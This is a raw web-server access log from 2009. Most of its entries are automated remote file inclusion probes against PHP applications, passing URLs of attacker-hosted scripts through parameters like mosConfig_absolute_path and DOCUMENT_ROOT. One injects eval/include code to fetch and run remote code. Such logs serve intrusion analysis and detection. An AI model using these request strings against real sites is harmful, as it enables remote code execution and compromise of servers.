89.96.209.10 - - [06/Sep/2009:21:48:51 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:48:58 -0700] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [06/Sep/2009:21:48:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [06/Sep/2009:21:48:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [06/Sep/2009:21:51:22 -0700] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.96.209.10 - - [06/Sep/2009:21:51:30 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [06/Sep/2009:21:52:44 -0700] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:51 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:51 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:51 -0700] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:57 -0700] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:57 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:52:57 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:53:12 -0700] "GET /logs/access_090608.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:21:53:21 -0700] "GET /logs/access_090608.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.218.40.180 - - [06/Sep/2009:21:53:36 -0700] "GET /logs/access_090525.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.218.40.180 - - [06/Sep/2009:21:53:36 -0700] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.218.40.180 - - [06/Sep/2009:21:53:37 -0700] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.91 - - [06/Sep/2009:21:54:24 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:22:00:07 -0700] "GET /logs//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:22:00:07 -0700] "GET /logs/access_090302.log%20%20//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:22:00:07 -0700] "GET /?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [06/Sep/2009:22:00:12 -0700] "GET /logs/access_090406.log%20%20//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [06/Sep/2009:22:03:19 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:22 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:22 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:22 -0700] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:34 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:34 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:34 -0700] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:49 -0700] "GET /logs/access_090608.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:04:55 -0700] "GET /logs/access_090608.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [06/Sep/2009:22:06:46 -0700] "GET /logs/access.log//TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.184.252.3 - - [06/Sep/2009:22:06:47 -0700] "GET /TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.184.252.3 - - [06/Sep/2009:22:06:47 -0700] "GET /logs//TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
62.128.135.52 - - [06/Sep/2009:22:08:35 -0700] "GET /logs/access.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.128.135.52 - - [06/Sep/2009:22:08:35 -0700] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.128.135.52 - - [06/Sep/2009:22:08:35 -0700] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:46 -0700] "GET /logs/access_090309.log////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:46 -0700] "GET ///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:46 -0700] "GET /logs////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:47 -0700] "GET ///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:47 -0700] "GET /logs////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:47 -0700] "GET /logs/access_090309.log////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:52 -0700] "GET /logs/access_090223.log////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:13:53 -0700] "GET /logs/access_090223.log////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:14:51 -0700] "GET /logs/access_090309.log%20%20////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:14:53 -0700] "GET /logs/access_090309.log%20%20////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:14:57 -0700] "GET /logs/access_090223.log%20%20////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.59.104.147 - - [06/Sep/2009:22:14:57 -0700] "GET /logs/access_090511.log%20%20//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.59.104.147 - - [06/Sep/2009:22:14:57 -0700] "GET /setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.59.104.147 - - [06/Sep/2009:22:14:57 -0700] "GET /logs//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:15:00 -0700] "GET /logs/access_090223.log%20%20////e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.59.104.147 - - [06/Sep/2009:22:15:32 -0700] "GET /logs/access_090525.log%20%20//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [06/Sep/2009:22:15:37 -0700] "GET /e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
62.140.23.192 - - [06/Sep/2009:22:15:37 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
59.106.19.105 - - [06/Sep/2009:22:16:04 -0700] "GET /logs/access_090511.log%20%20//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.106.19.105 - - [06/Sep/2009:22:16:04 -0700] "GET /setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.106.19.105 - - [06/Sep/2009:22:16:04 -0700] "GET /logs//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.106.19.105 - - [06/Sep/2009:22:16:55 -0700] "GET /logs/access_090525.log%20%20//setup.php?dir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.146.177.61 - - [06/Sep/2009:22:23:58 -0700] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
202.146.177.61 - - [06/Sep/2009:22:24:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
202.146.177.61 - - [06/Sep/2009:22:24:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
202.146.177.61 - - [06/Sep/2009:22:24:03 -0700] "GET /logs/access.log HTTP/1.1" 200 89841 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
218.27.203.107 - - [06/Sep/2009:22:29:26 -0700] "GET /logs/access.log//TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.27.203.107 - - [06/Sep/2009:22:29:27 -0700] "GET /TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.27.203.107 - - [06/Sep/2009:22:29:28 -0700] "GET /logs//TotalCalendar/about.php?inc_dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
83.18.11.100 - - [06/Sep/2009:22:30:05 -0700] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.pl/search?hl=pl&lr=&ei=DZqkSriaDsqOsAbK-pnTBA&sa=X&oi=spell&resnum=1&ct=result&cd=1&q=index+of+logs&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:30:06 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:30:09 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:30:31 -0700] "GET /logs/access_090907.log HTTP/1.1" 200 3152962 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:33:58 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:34:08 -0700] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:34:12 -0700] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:34:56 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:35:00 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:35:02 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
83.18.11.100 - - [06/Sep/2009:22:35:05 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)" "www.galf.org"
63.249.95.132 - - [06/Sep/2009:22:35:25 -0700] "GET /logs/access_090427.log%20/includes/search.php?GlobalSettings[templatesDirectory]=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
216.65.20.79 - - [06/Sep/2009:22:41:20 -0700] "GET /logs/access_090413.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [06/Sep/2009:22:41:20 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [06/Sep/2009:22:41:20 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [06/Sep/2009:22:41:29 -0700] "GET /logs/access_090216.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
211.189.18.73 - - [06/Sep/2009:22:47:14 -0700] "GET /logs/index.php?body=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [06/Sep/2009:22:47:14 -0700] "GET /logs/access_090413.log/index.php?body=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [06/Sep/2009:22:47:14 -0700] "GET /index.php?body=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:49:52 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:49:52 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.177.11.182 - - [06/Sep/2009:22:49:52 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.annunci-motori.it/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:28 -0700] "GET /logs/access_090223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:28 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:28 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:30 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:30 -0700] "GET /logs/access_090223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [06/Sep/2009:22:50:33 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.108.252.200 - - [06/Sep/2009:22:50:41 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.108.252.200 - - [06/Sep/2009:22:50:41 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
67.108.252.200 - - [06/Sep/2009:22:50:41 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:50:56 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
208.77.96.146 - - [06/Sep/2009:22:50:56 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
